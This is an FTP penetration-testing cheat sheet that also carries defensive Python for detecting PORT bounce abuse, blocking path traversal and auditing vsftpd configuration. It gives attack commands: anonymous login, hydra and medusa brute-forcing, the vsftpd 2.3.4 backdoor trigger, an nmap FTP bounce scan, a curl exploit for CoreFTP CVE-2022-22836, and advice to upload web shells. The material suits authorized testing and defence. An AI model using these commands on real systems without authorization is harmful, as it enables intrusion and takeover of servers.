🛡️ Methodology Checklist
- Banner grab: nc [TARGET] 21
- Anonymous login: ftp [TARGET] → user: anonymous
- List and download files: ls -la; get [FILE]
- Brute-force: hydra -L users.txt -P pass.txt ftp://[TARGET]
- Check for writable directories: put test.txt
- vsftpd 2.3.4 backdoor: connect to port 6200 after triggering
- ProFTPD mod_copy: SITE CPFR/CPTO to copy files
- Check FTP banner for exact version → CVE research
🎯 Operational Context
Use when: FTP (port 21) is exposed — check anonymous access, brute credentials, exploit CVEs (vsftpd backdoor), or abuse writable directories.
Think Dumber First: ftp [TARGET] → username anonymous → password (blank or email). If anonymous works, immediately check for writable dirs (put test.txt). If writable + web accessible = webshell upload path.
Skip when: FTP is internal-only and you have better access vectors.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sudo nmap -sC -sV -p 21 [TARGET_IP] | FTP version scan + anonymous login check |
| nc -vn [TARGET_IP] 21 | Manual banner grab |
| ftp [TARGET_IP] → anonymous / blank | Test anonymous login |
| ftp> ls -R | Recursive directory listing |
| ftp> get [FILE] | Download single file |
| ftp> mget * | Download all files |
| ftp> put [FILE] | Upload file (if write access) |
| ftp> binary | Switch to binary mode (use before downloading any non-text file) |
| ftp> prompt | Disable interactive prompt (speeds up mget) |
| medusa -u [USER] -P [WORDLIST] -h [TARGET_IP] -M ftp | Brute-force FTP credentials |
| medusa -u [USER] -P [WORDLIST] -h [TARGET_IP] -n 2121 -M ftp | Brute-force non-standard port |
| nmap -Pn -v -n -p 80 -b anonymous:password@[FTP_IP] [INTERNAL_IP] | FTP bounce attack — scan internal host via FTP proxy |
| curl -k -X PUT -H "Host: [TARGET_IP]" --basic -u [USER]:[PASS] --data-binary "PoC." --path-as-is https://[TARGET_IP]/../../../../../../whoops | CVE-2022-22836 CoreFTP directory traversal + arbitrary file write |
🔬 Deep Dive & Workflow
Anonymous Access — Common Misconfiguration
The most valuable FTP finding is anonymous access. Test immediately:
```
ftp [TARGET_IP]
Username: anonymous
Password: <Enter> or anonymous
```
Once in:
- Run ls -R for complete inventory
- Download config files, backups, keys with get or mget *
- If write access exists AND a web server is co-hosted: upload a PHP web shell and trigger via HTTP → RCE
FTP Bounce Attack (Internal Pivot)
The PORT command tells the FTP server where to send data. Abusing it forces the FTP server to scan or connect to internal hosts unreachable from the outside:
```
# Use FTP server as a proxy to probe internal host port 80
nmap -Pn -v -n -p 80 -b anonymous:password@[FTP_IP] [INTERNAL_IP]
```
Useful when the FTP server is in a DMZ with access to the internal network.
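A defender-side check for the PORT abuse described above, as an added example that is not part of the original page: it parses PORT arguments from FTP command logs and flags data addresses that differ from the control-connection peer, plus privileged data ports. The (peer, command) event shape and the sample events are constructed assumptions; adapt the parsing to your server's log format.

```python
import ipaddress
import re

# RFC 959 PORT argument: h1,h2,h3,h4,p1,p2 (four address octets, then port high/low byte).
PORT_RE = re.compile(r"^PORT\s+(\d{1,3}(?:,\d{1,3}){5})$", re.IGNORECASE)

def parse_port(command):
    """Return (address, port) for a well-formed PORT command, else None."""
    m = PORT_RE.match(command.strip())
    if not m:
        return None
    nums = [int(n) for n in m.group(1).split(",")]
    if any(n > 255 for n in nums):
        return None
    address = ipaddress.ip_address(".".join(str(n) for n in nums[:4]))
    return address, nums[4] * 256 + nums[5]

def bounce_findings(events):
    """events: (control-connection peer IP, FTP command) pairs from a server log."""
    findings = []
    for peer, command in events:
        parsed = parse_port(command)
        if parsed is None:
            continue
        address, port = parsed
        reasons = []
        if address != ipaddress.ip_address(peer):
            reasons.append("data address is not the control-connection peer")
        if port < 1024:
            reasons.append("privileged data port")
        if reasons:
            findings.append((peer, str(address), port, reasons))
    return findings

# Constructed sample events, not real traffic.
SAMPLE_EVENTS = [
    ("203.0.113.7", "USER anonymous"),
    ("203.0.113.7", "PORT 203,0,113,7,195,80"),  # own address, port 50000: normal
    ("203.0.113.7", "PORT 10,0,0,5,0,80"),       # third-party address, port 80
    ("198.51.100.9", "port 198,51,100,9,0,22"),  # own address, privileged port
    ("198.51.100.9", "PORT 300,1,1,1,0,80"),     # malformed octet: ignored
]

if __name__ == "__main__":
    for finding in bounce_findings(SAMPLE_EVENTS):
        print(finding)
```

Clients behind NAT can legitimately send a private address in PORT, so treat an address mismatch as a lead to triage rather than proof. On vsftpd the server-side control is leaving port_promiscuous at its default of NO.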
CVE-2022-22836 — CoreFTP HTTP PUT Traversal
CoreFTP Server (pre-build 727) supports HTTP alongside FTP. The HTTP PUT handler fails to sanitize ../ sequences in the path, allowing authenticated write anywhere on the filesystem.
Critical flag: --path-as-is — without it, curl resolves the traversal locally before sending, and the server never sees the attack:
```
curl -k -X PUT -H "Host: [TARGET_IP]" \
  --basic -u [USER]:[PASS] \
  --data-binary "PoC." \
  --path-as-is https://[TARGET_IP]/../../../../../../whoops
# Verify on target:
# type C:\whoops → PoC.
```
Attack flow: path traversal bypasses folder restriction → CoreFTP writes with its own SYSTEM/Admin privileges → arbitrary file planted (web shell, config override, etc.)
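The missing server-side check, shown as an added example (not CoreFTP's code and not from the original page): the naive join resolves the traversal out of the upload folder, while the hardened version decodes, resolves and then verifies containment. The upload root C:\ftp\alice and the function names are hypothetical.

```python
import ntpath
from urllib.parse import unquote

def naive_target(upload_root, request_path):
    """Vulnerable pattern: append the raw request path and let '..' resolve later."""
    return ntpath.normpath(upload_root + request_path)

def safe_target(upload_root, request_path):
    """Return the resolved path if it stays inside upload_root, else None."""
    decoded = unquote(request_path)              # %2e%2e%2f is still ../
    if "\x00" in decoded:
        return None
    root = ntpath.normpath(upload_root)
    # Drop leading separators so the request can never replace the root on join.
    candidate = ntpath.normpath(ntpath.join(root, decoded.lstrip("/\\")))
    # Compare case-insensitively and on a separator boundary, so that
    # C:\ftp\alice2 is not accepted as being "inside" C:\ftp\alice.
    root_cmp, cand_cmp = ntpath.normcase(root), ntpath.normcase(candidate)
    if cand_cmp != root_cmp and not cand_cmp.startswith(root_cmp + "\\"):
        return None
    return candidate

# Hypothetical per-user upload root; request paths below are constructed samples.
ROOT = r"C:\ftp\alice"
SAMPLES = [
    "/reports/../q1.txt",            # stays inside the root
    "/../../../../../../whoops",     # the request path from the page
    "/%2e%2e/%2e%2e/whoops",         # percent-encoded dot segments
    "/..\\..\\whoops",               # backslash separators
    "/../alice2/notes.txt",          # sibling folder sharing the root's prefix
    "/D:/whoops",                    # drive-qualified path
]

if __name__ == "__main__":
    for path in SAMPLES:
        print(f"{path!r:32} naive={naive_target(ROOT, path)!r} safe={safe_target(ROOT, path)!r}")
```

This is a string-level check only; a production handler should also resolve junctions and symlinks on the final path before writing.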
FTP Command Reference
| Command | Purpose |
|---|---|
| ls -R | Recursive listing |
| cd [dir] | Change directory |
| get [file] | Download file |
| put [file] | Upload file |
| mget * | Download all (use prompt first) |
| binary | Binary transfer mode — always set before downloading EXE/ZIP/images |
| ascii | ASCII transfer mode (text files) |
| prompt | Toggle interactive prompting |
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Anonymous FTP login denied | Anonymous disabled | Brute force: hydra -L users.txt -P pass.txt ftp://[TARGET] |
| FTP connects but hangs on LIST | Passive mode needed | Switch to passive: ftp> passive or use curl ftp://[TARGET]/ --user anon: |
| File upload rejected | Write permission denied on current dir | Try changing directory: cd uploads or cd incoming — often writable subdirs exist |
| vsftpd 2.3.4 exploit fails | Backdoor already patched or wrong version | Confirm version: nc [TARGET] 21 → check banner; try manual trigger :) after username |
| Downloaded file corrupt | Binary mode not set | Use binary command in FTP session before transfer; or wget/curl FTP URL directly |
📝 Reporting Trigger
- Finding Title: FTP Service Permits Anonymous Access with Writable Directory
- Impact: Anonymous FTP access with write permissions allows unauthenticated upload of malicious files including web shells when FTP root overlaps with web root, enabling direct remote code execution.
- Root Cause: FTP server configured with anonymous login enabled and write permissions not restricted. FTP root directory shared with web application.
- Recommendation: Disable anonymous FTP access. Implement strong authentication for all FTP accounts. Segregate FTP directory from web root. Consider migrating to SFTP (port 22) and disabling FTP entirely.
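To verify the recommendation on a vsftpd host, the following added example (not from the original page) audits a vsftpd.conf for the three conditions in the finding: anonymous login, anonymous write, and an anonymous root that overlaps a web root. The sample configs and the /var/www web root are constructed assumptions; option names and defaults are those documented in vsftpd.conf(5).

```python
from pathlib import PurePosixPath

TRUE_VALUES = {"YES", "TRUE", "1"}
# Built-in vsftpd defaults for the options checked here. Note anonymous_enable
# defaults to YES, so a config that never mentions it still allows anonymous login.
DEFAULTS = {"anonymous_enable": "YES", "write_enable": "NO", "anon_upload_enable": "NO",
            "anon_mkdir_write_enable": "NO", "anon_other_write_enable": "NO", "anon_root": ""}
ANON_WRITE_OPTS = ("anon_upload_enable", "anon_mkdir_write_enable", "anon_other_write_enable")

def parse_conf(text):
    """vsftpd.conf lines are key=value; lines starting with '#' are comments."""
    conf = dict(DEFAULTS)
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key] = value
    return conf

def on(conf, key):
    return conf[key].upper() in TRUE_VALUES

def overlaps(a, b):
    """True if either directory contains the other (Python 3.9+)."""
    a, b = PurePosixPath(a), PurePosixPath(b)
    return a.is_relative_to(b) or b.is_relative_to(a)

def audit(text, web_roots=("/var/www",)):
    conf, findings = parse_conf(text), []
    if not on(conf, "anonymous_enable"):
        return findings
    findings.append("anonymous-login-enabled")
    # The anon_* write options only take effect when write_enable is also on.
    anon_write = [k for k in ANON_WRITE_OPTS if on(conf, k)]
    if on(conf, "write_enable") and anon_write:
        findings.append("anonymous-write:" + ",".join(anon_write))
    # Only an explicit anon_root is checked; without one vsftpd uses the ftp user's home.
    if conf["anon_root"] and any(overlaps(conf["anon_root"], w) for w in web_roots):
        findings.append("anon-root-overlaps-web-root")
    return findings

# Constructed sample configurations.
WEAK = "anonymous_enable=YES\nwrite_enable=YES\nanon_upload_enable=YES\nanon_root=/var/www/html/uploads\n"
HARDENED = "anonymous_enable=NO\nlocal_enable=YES\nwrite_enable=YES\nchroot_local_user=YES\n"

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED), ("empty", "")):
        print(name, audit(text))
```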